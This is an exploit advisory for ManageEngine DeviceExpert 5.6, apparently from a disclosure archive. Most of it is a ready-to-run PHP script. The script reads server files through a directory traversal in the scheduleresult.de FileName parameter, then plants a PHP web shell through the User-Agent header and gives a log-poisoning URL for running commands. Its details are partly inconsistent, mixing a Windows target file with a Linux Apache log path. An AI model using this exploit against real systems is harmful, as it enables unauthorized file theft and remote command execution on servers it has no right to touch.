ManageEngine DeviceExpert 5.6 Traversal / Code Execution

=============================================================================================================================================
| # Title ManageEngine DeviceExpert 5.6 Traversal / Code Execution

=============================================================================================================================================
| # Title : ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://download.manageengine.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Web Shell injection if the target has an LFI (Local File Inclusion) vulnerability with code execution capability, or RFI (Remote File Inclusion),

or if we can write to a path that the web server can execute,

such as the uploads or webroot folder on the server.

( https://packetstorm.news/files/id/181161/ )

[+] save code as poc.php.

[+] Set Target : line 81

[+] USage : php poc.php

[+] PayLoad :

<?php

class ManageEngineScanner {
private $host;
private $port;
private $ssl;
private $filepath;

public function __construct($host, $port = 6060, $ssl = true, $filepath = 'windows\\win.ini') {
$this->host = $host;
$this->port = $port;
$this->ssl = $ssl;
$this->filepath = $filepath;
}

private function sendRequest($uri, $headers = []) {
$protocol = $this->ssl ? 'https' : 'http';
$url = "$protocol://{$this->host}:{$this->port}$uri";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 25);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

return [$http_code, $response];
}

public function run() {
$traverse = str_repeat("..\\", 10);
$filename = $this->filepath;

list($code, $response) = $this->sendRequest("/scheduleresult.de");
if ($code !== 200) {
echo "[ERROR] Target is not ManageEngine DeviceExpert\n";
return;
}

list($code, $response) = $this->sendRequest("/scheduleresult.de/?FileName={$traverse}{$filename}");

if ($code === 200) {
echo "[SUCCESS] {$this->host}:{$this->port} returns: $code\n";
if (!empty($response)) {
$this->saveFile($response);
} else {
echo "[ERROR] {$this->host}:{$this->port} - no file downloaded (empty)\n";
}
} elseif ($code === 404) {
echo "[ERROR] {$this->host}:{$this->port} - file not found\n";
} else {
echo "[ERROR] Unable to communicate with {$this->host}:{$this->port}\n";
}
}

private function saveFile($content) {
$filename = basename($this->filepath);
$path = __DIR__ . "/$filename";
file_put_contents($path, $content);
echo "[SUCCESS] File saved in: $path\n";
}

public function injectWebShell() {
$webshell = "<?php system(\$_GET['cmd']); ?>";
$headers = ["User-Agent: " . $webshell];

list($code, $response) = $this->sendRequest("/scheduleresult.de", $headers);

if ($code === 200) {
echo "[SUCCESS] Web Shell injected via User-Agent!\n";
echo "Access it at: http://{$this->host}/scheduleresult.de/?FileName=../../../../../../var/log/apache2/access.log&cmd=id\n";
} else {
echo "[ERROR] Web Shell injection failed!\n";
}
}
}

$scanner = new ManageEngineScanner('target_ip_here');
$scanner->run();
$scanner->injectWebShell();

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================